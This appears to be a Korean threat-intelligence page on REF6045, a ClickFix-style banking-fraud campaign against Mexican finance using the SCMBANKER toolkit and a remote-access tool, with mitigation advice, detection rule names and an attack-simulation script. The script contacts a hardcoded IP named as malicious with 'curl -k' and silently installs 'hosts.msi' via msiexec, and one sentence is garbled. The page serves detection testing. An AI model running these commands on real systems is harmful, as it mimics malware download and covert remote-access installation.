ClickFix에서 현금화까지: 멕시코 은행 사기 도구 세트 분석
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
REF6045는 멕시코 금융 부문을 대상으로 한 운영자 지원 은행 사기 캠페인입니다. 이것은 피해자를 악성 PowerShell 명령을 실행하도록 설득하기 위해 가짜 CAPTCHA 페이지를 사용하는 ClickFix 스타일의 전달 방법을 사용합니다. 감염 후 인적 운영자가 은행 세션을 관찰하고, 스크린샷을 캡처하며, 클립보드 내용을 변경하고, 완전한 원격 제어를 위해 Remote Utilities RAT을 배포할 수 있는 SCMBANKER 도구 키트를 제공합니다.
조사
Elastic Security Labs는 의심스러운 활동을 감지한 후 이 위협을 발견했습니다. bitsadmin 활동은 열린 디렉터리에서 PowerShell 스크립트를 다운로드하고 있었습니다. 조사는 공개적으로 접근 가능한 웹 루트 아카이브, zkt.zip를 통해 전체 도구 키트를 드러내었고, 명령 및 제어 인프라에서의 인증되지 않은 파일 편집기 및 열린 디렉터리를 포함하는 주요 운영 보안 약점을 드러냈습니다. 분석은 또한 도구 키트가 코드베이스에서 광범위한 AI 생성 아티팩트를 포함하고 있음을 보여주었습니다.
완화
조직은 PowerShell 및 bitsadmin 를 승인된 사용자에게만 제한하고 엄격한 실행 통제를 시행해야 합니다. 사용자는 가짜 CAPTCHA 프롬프트나 가짜 Windows 업데이트 화면과 같은 사회공학 공격을 식별할 수 있도록 교육받아야 합니다. 보안 팀은 또한 의심스러운 레지스트리 변경과 원격 액세스 소프트웨어의 무단 설치에 대한 강력한 모니터링을 배포해야 합니다.
대응
이 활동이 감지되면 지휘 및 제어 통신과 가능한 데이터 도난을 중지하기 위해 즉시 감염된 시스템을 격리하십시오. 침해 범위를 결정하기 위해 포렌식 조사를 수행하고 Remote Utilities 또는 무단 레지스트리 수정을 확인합니다. 감염된 기기에서 접근한 모든 금융 및 기타 민감한 계정의 비밀번호를 재설정하십시오.
공격 흐름
탐지
쉘 프로세스에 의해 생성된 MsiExec (via cmdline)
보기
Attrib 실행으로 파일 숨기기 (via cmdline)
보기
공용 사용자 프로필 내의 의심스러운 파일 (via file_event)
보기
숨겨진 PowerShell 명령줄을 통한 실행 가능성 (via cmdline)
보기
시스템 중단 또는 재부팅을 강제하는 종료 (via cmdline)
보기
LOLBAS Bitsadmin (via cmdline)
보기
지연된 실행 동작 가능성 (via cmdline)
보기
계정 또는 그룹 나열 / 조작 가능성 (via cmdline)
보기
Microsoft Edge에서 발생한 비정상적인 프로세스 생성 (via cmdline)
보기
의심스러운 CURL 사용 (via cmdline)
보기
의심스러운 실행 파일/스크립트 위치 [cmd.exe /C] (via cmdline)
보기
SCMBANKER 및 Remote Utilities 설치 탐지 [Windows Process Creation]
보기
SCMBANKER 도구 키트 활동 탐지 [Windows Powershell]
보기
시뮬레이션 실행
전제조건: 텔레메트리 & 베이스라인 사전 비행 검사가 통과되어야 합니다.
이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적대적 기술(TTP)의 정확한 실행을 세부적으로 설명합니다. 명령 및 스토리는 식별된 TTP를 직접 반영해야 하며 탐지 논리로 예상되는 정확한 텔레메트리를 생성해야 합니다. 추상적이거나 관련 없는 예시는 잘못된 진단을 초래할 수 있습니다.
-
공격 설명 및 명령: 적은 REF6045 은행 사기 패턴을 모방하여 목표 시스템에 발판을 마련하려고 합니다. 먼저, 하드코딩된 악성 IP 주소 (
68.211.161.46)에서 유효성 파일을 다운로드하려고 시도합니다.curl을 사용하여 SSL 인증서를 검증하지 않기 위해-k(비보안) 플래그를 사용합니다. 다운로드 후, 적은 악성 원격 액세스 도구를msiexec.exe을 사용하여 SSL 인증서를 검증하지 않기 위해/i(설치) 및/quiet(무음) 스위치를 사용하여 조용히 설치합니다. 이 파일은hosts.msi로 명명된 파일을 대상으로 하며 사용자 상호 작용을 최소화하면서 지속적인 원격 액세스를 제공합니다. -
회귀 테스트 스크립트:
# REF6045 TTPs에 대한 시뮬레이션 스크립트 # 이 스크립트는 탐지 규칙에 정의된 특정 명령 줄을 모방합니다. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] 단계 1: curl을 통한 도구 전송 시뮬레이션 중..." -ForegroundColor Cyan # 참고: 실제 악성 트래픽을 피하기 위해 curl을 통한 가짜 파일 사용, # 그러나 탐지에 필요한 정확한 명령 줄 문자열 유지. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] 단계 2: MSI 무소음 설치 시뮬레이션 중..." -ForegroundColor Cyan # msiexec가 즉시 에러를 발생하지 않도록 더미 MSI 파일 생성 (그러나 규칙은 명령 줄에서 트리거됨) # DETECTION LOGIC (명령 줄)을 순수하게 테스트하기 위해 # 정확한 명령 문자열을 실행합니다. msiexec /i "hosts.msi" /quiet /norestart -
정리 명령:
# 아티팩트 제거를 위한 정리 스크립트 $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] 정리 완료: $WorkDir 제거됨." -ForegroundColor Green } else { Write-Host "[!] 정리 건너뜀: 디렉터리를 찾을 수 없음." -ForegroundColor Yellow }